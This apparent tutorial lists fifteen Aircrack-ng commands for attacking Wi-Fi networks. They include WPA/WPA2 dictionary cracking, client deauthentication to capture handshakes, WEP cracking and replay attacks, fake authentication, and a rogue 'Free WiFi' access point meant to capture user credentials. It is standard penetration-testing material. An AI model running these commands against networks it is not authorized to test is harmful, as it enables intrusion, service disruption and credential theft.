Top 15 Aircrack-ng Commands For Cracking Wireless Networks

Aircrack-ng Commands

Aircrack-ng is a powerful suite of tools used for network security assessment and penetration testing of wireless networks. It allows users to monitor, capture, and analyze wireless traffic, as well as perform attacks to test security vulnerabilities.

Here are the top 15 Aircrack-ng commands you should know:

  1. Crack WPA/WPA2-PSK Passwords
  2. Crack WPA Handshake with Specific SSID
  3. Capture Wireless Network Packets
  4. Deauthenticate Clients to Capture Handshakes
  5. Capture Packets on a Specific Channel and BSSID
  6. Use PTW Attack Against WEP
  7. Use KoreK Attack Against WEP
  8. Capture Packets on All Wireless Bands
  9. Perform ARP Replay Attack
  10. Perform Injection Test
  11. Fake Authentication Attack
  12. Interactive Packet Replay Attack
  13. Write Captured Packets to a File
  14. Create a Fake Access Point
  15. Decrypt WEP/WPA Packets with Known Key

1. Crack WPA/WPA2-PSK Passwords

aircrack-ng -a2 -b [BSSID] -w /path/to/wordlist /path/to/capture.cap

This command attempts to crack WPA/WPA2-PSK passwords using a dictionary attack.

2. Crack WPA Handshake with Specific SSID

aircrack-ng -e [SSID] -w /path/to/wordlist /path/to/capture.cap

If you have a specific SSID in mind, this command targets that network’s handshake for password cracking.

3. Capture Wireless Network Packets

airodump-ng wlan0

This command scans available wireless networks and captures packets for analysis.

4. Deauthenticate Clients to Capture Handshakes

aireplay-ng -0 10 -a [BSSID] wlan0

This command forces clients to disconnect from an access point, making them reconnect and send a handshake, which can be captured for password cracking.

5. Capture Packets on a Specific Channel and BSSID

airodump-ng -c 6 --bssid [BSSID] -w capture wlan0

This command targets a specific channel and BSSID to capture packets, which is useful for focused attacks.

6. Use PTW Attack Against WEP

aircrack-ng -z /path/to/capture.cap

The PTW attack is a faster method to crack WEP encryption using statistical techniques.

7. Use KoreK Attack Against WEP

aircrack-ng -K /path/to/capture.cap

This command applies KoreK attacks, which are multiple statistical attacks to break WEP keys.

8. Capture Packets on All Wireless Bands

airodump-ng --band abg wlan0

This command enables scanning across all wireless bands (802.11a, b, and g).

9. Perform ARP Replay Attack

aireplay-ng -3 -b [BSSID] wlan0

An ARP replay attack helps generate traffic on WEP networks, making cracking easier.

10. Perform Injection Test

aireplay-ng -9 wlan0

This command checks whether your wireless adapter supports packet injection, which is crucial for certain attacks.

11. Fake Authentication Attack

aireplay-ng -1 0 -e [SSID] -a [BSSID] -h [MAC] wlan0

This attack associates your device with the target AP, helping in further attacks like WEP cracking.

12. Interactive Packet Replay Attack

aireplay-ng -2 -r /path/to/arp-request wlan0

This command allows for interactive packet replay, helping in network penetration testing.

13. Write Captured Packets to a File

airodump-ng --write /path/to/output wlan0

This command saves captured packets for later analysis.

14. Create a Fake Access Point

airbase-ng -e "Free WiFi" -c 6 wlan0

This command creates a rogue access point to capture user credentials.

15. Decrypt WEP/WPA Packets with Known Key

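airdecap-ng -e [SSID] -p [PASSPHRASE] /path/to/capture.cap

If you already have the encryption key, this command decrypts captured packets for analysis. The form shown is for WPA/WPA2, where -p supplies the passphrase; for WEP, supply the hex key with -w instead.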

Conclusion

Aircrack-ng is a vital tool for ethical hackers and security professionals to test and secure wireless networks. Mastering these 15 commands will help you efficiently assess vulnerabilities and enhance network security.
